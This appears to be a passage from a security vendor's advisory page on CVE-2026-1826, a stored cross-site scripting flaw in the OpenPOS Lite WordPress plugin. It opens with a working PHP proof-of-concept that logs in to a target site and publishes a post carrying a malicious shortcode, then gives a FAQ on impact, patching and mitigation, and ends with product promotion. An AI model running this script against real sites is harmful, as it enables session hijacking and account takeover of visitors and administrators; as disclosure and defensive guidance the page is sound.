// Create a new post with the malicious shortcode
$post_title = 'Test Post with XSS Payload';
$post_content = 'This post contains a malicious OpenPOS shortcode: ' . $malicious_shortcode;

// Initialize cURL session for WordPress authentication
$ch = curl_init();

// First, authenticate to get nonce and cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

// Check if authentication succeeded
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Get nonce for post creation (from admin-ajax.php or rest API)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'rest-nonce'
]));

$response = curl_exec($ch);

// Create post via REST API
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . (preg_match('/"nonce":"([^"]+)"/', $response, $matches) ? $matches[1] : '')
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
    'title' => $post_title,
    'content' => $post_content,
    'status' => 'publish'
]));

$response = curl_exec($ch);
$result = json_decode($response, true);

if (isset($result['id'])) {
    echo "Success! Post created with ID: " . $result['id'] . "n";
    echo "Visit: " . $target_url . "/?p=" . $result['id'] . " to trigger the XSS payloadn";
    echo "The malicious shortcode will execute JavaScript when the page loads.n";
} else {
    echo "Failed to create post. Response: " . $response . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1826?
Overview of the vulnerability
CVE-2026-1826 is a stored cross-site scripting (XSS) vulnerability in the OpenPOS Lite plugin for WordPress. It allows authenticated attackers with Contributor-level access and above to inject malicious scripts via the ‘width’ parameter of the order_qrcode shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the shortcode rendering functions. Attackers can embed malicious JavaScript in the ‘width’ or ‘height’ attributes of the shortcode, which executes when users view the affected page.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using OpenPOS Lite version 3.0 or earlier is susceptible to this vulnerability. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the OpenPOS Lite plugin installed. If it is version 3.0 or earlier, your site is at risk and should be updated immediately.
How can I fix CVE-2026-1826?
Recommended actions
To fix CVE-2026-1826, update the OpenPOS Lite plugin to version 3.1 or later, where the vulnerability has been patched. Ensure that all instances of the plugin are updated across your WordPress installations.
What does the CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, it can still lead to significant security risks such as session hijacking or content manipulation.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the context of authenticated users. This could lead to session hijacking, administrative account takeover, or defacement of site content.
What is the proof of concept for this vulnerability?
Demonstrating the issue
The proof of concept demonstrates how an authenticated user can create a post containing a malicious shortcode. When the post is viewed, the injected JavaScript executes, showcasing the stored XSS vulnerability.
What are the key changes in the patched version?
Improvements made in version 3.1
In version 3.1, the plugin was updated to include proper sanitization of the ‘width’ and ‘height’ attributes using the esc_attr() function. This prevents script injection by encoding special HTML characters.
What additional security measures should I take?
Beyond patching the vulnerability
In addition to updating the plugin, consider implementing security best practices such as using a web application firewall, regularly scanning for vulnerabilities, and limiting user permissions to reduce the risk of exploitation.
How can I stay informed about vulnerabilities like this?
Keeping up to date with security news
To stay informed, follow reputable security blogs, subscribe to WordPress security mailing lists, and monitor the official WordPress plugin repository for updates and security advisories.
Is there any way to mitigate the risk if I cannot update immediately?
Temporary measures to reduce exposure
If immediate updating is not possible, consider disabling the OpenPOS Lite plugin until a patch can be applied. Additionally, review user roles and limit access to trusted users only.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations